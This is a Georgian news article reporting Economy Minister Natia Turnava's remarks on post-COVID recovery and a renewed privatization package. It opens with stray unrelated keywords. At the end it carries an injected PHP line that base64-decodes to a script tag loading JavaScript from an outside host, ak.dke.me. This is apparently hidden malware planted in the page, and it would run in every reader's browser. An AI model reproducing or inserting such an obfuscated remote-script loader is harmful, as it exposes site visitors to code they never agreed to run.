celsiusi
ავერსი შნაიდერი
ჩვენ ვართ ქვეყანა, რომელსაც აქვს შანსი, ყველაზე სწრაფად აღადგინოს ეკონომიკა, დაუბრუნდეს პოზიტიური ეკონომიკური ზრდის ტრაექტორიას და შევინარჩუნოთ რეგიონში ყველაზე მაღალი ეკონომიკური ზრდის ტემპი, -ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ნათია თურნავამ პროგრამის „100 საინვესტიციო შეთავაზება ბიზნესს“ პრეზენტაციაზე განაცხადა.
 
მისი თქმით, ამ შემთხვევაში, ხელისუფლება კოვიდ პანდემიას განიხილავს, როგორც შესაძლებლობას, რომ უფრო გაბედული ნაბიჯები გადადგას.
 
„ჩვენ ყველაფერი უნდა გავაკეთოთ იმისთვის, რომ რაც შეიძლება სწრაფად დავძლიოთ კოვიდ პანდემიით გამოწვეული შოკი. ყველა პროგნოზით ჩვენ ვართ ქვეყანა, რომელსაც აქვს შანსი, ყველაზე უფრო სწრაფად აღადგინოს ეკონომიკა, დაუბრუნდეს პოზიტიური ეკონომიკური ზრდის ტრაექტორიას და შევინარჩუნოთ რეგიონში ყველაზე მაღალი ეკონომიკური ზრდის ტემპი. თუმცა, ამისთვის ძალიან ბევრი რამ გვაქვს გასაკეთებელი. ამ შემთხვევაში, ჩვენ კოვიდ პანდემიას, რომელიც უდიდესი გამოწვევაა, მთელი მსოფლიოსთვის და საქართველოსთვის, განვიხილავთ, როგორც შესაძლებლობას. ერთი მხრივ, ეს არის შესაძლებლობა იმისთვის, რომ გახდეს უფრო ეფექტიანი, უფრო კონკურენტუნარიანი და უფრო ძლიერი, მაგრამ ჩვენთვის ხელისუფლებისთვის, ეკონომიკის სამინისტროსთვის, ჩემი კოლეგებისთვის ეს არის დრო, როდესაც ჩვენ უნდა გადავდგათ უფრო გაბედული ნაბიჯები და უფრო სტანდარტული გადაწყვეტილებები მივიღოთ. სწორედ ასეთი მასშტაბური, არასტანდარტული გადაწყვეტილება მივიღეთ ირაკლი ღარიბაშვილის დავალებით, როდესაც უპრეცედენტოდ მასშტაბური, პრივატიზაციის განახლებული პაკეტი და სტრატეგია შემოგთავაზეთ დღეს“,-განაცხადა თურნავამ.
 
 
 
1745
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");